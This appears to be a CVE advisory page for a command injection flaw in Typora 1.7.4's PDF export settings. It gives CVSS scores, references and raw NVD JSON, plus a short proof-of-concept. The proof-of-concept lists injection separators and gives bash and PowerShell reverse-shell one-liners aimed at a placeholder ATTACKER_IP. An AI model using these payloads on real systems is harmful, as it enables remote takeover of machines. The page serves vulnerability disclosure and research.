CVE-2024-14010

Description

Typora 1.7.4 contains a command injection vulnerability in the PDF export preferences that allows attackers to execute arbitrary system commands. Attackers can inject malicious commands into the 'run command' input field during PDF export to achieve remote code execution.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Typora < 1.7.5

Typora <= 1.7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import subprocess

# CVE-2024-14010 PoC - Typora Command Injection in PDF Export
# This PoC demonstrates how to exploit the command injection vulnerability

# Malicious command to be injected in Typora's PDF export "run command" field
# Example: Execute calculator on Windows
malicious_command = "calc.exe"

# For demonstration purposes, this shows the exploitation process
# In real attack, the following would be entered in Typora's PDF export preferences:
# In the "run command" field, enter:
# ; calc.exe
# or
# | calc.exe
# or
# `calc.exe`

print("[*] CVE-2024-14010 - Typora Command Injection PoC")
print(f"[*] Malicious command to inject: {malicious_command}")

# Simulate the vulnerable command construction
vulnerable_command = f"pdf_converter --output document.pdf ; {malicious_command}"
print(f"[*] Constructed command: {vulnerable_command}")

# Execute the command (this would be done by Typora in vulnerable version)
try:
    result = subprocess.Popen(vulnerable_command, shell=True)
    print("[+] Command executed successfully!")
except Exception as e:
    print(f"[-] Error: {e}")

# Reverse shell example (for educational purposes only)
# Attacker would inject something like:
# ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
# or on Windows:
# ; powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-14010
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-14010
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-14010/
[4] VulDB https://vuldb.com/cve/CVE-2024-14010
[5] http://www.typora.io
[6] https://www.exploit-db.com/exploits/51752
[7] https://www.vulncheck.com/advisories/typora-os-command-injection-via-export-pdf-preferences

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-14010", "sourceIdentifier": "[email protected]", "published": "2025-12-12T20:15:38.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typora 1.7.4 contains a command injection vulnerability in the PDF export preferences that allows attackers to execute arbitrary system commands. Attackers can inject malicious commands into the 'run command' input field during PDF export to achieve remote code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "http://www.typora.io", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51752", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/typora-os-command-injection-via-export-pdf-preferences", "source": "[email protected]"}]}}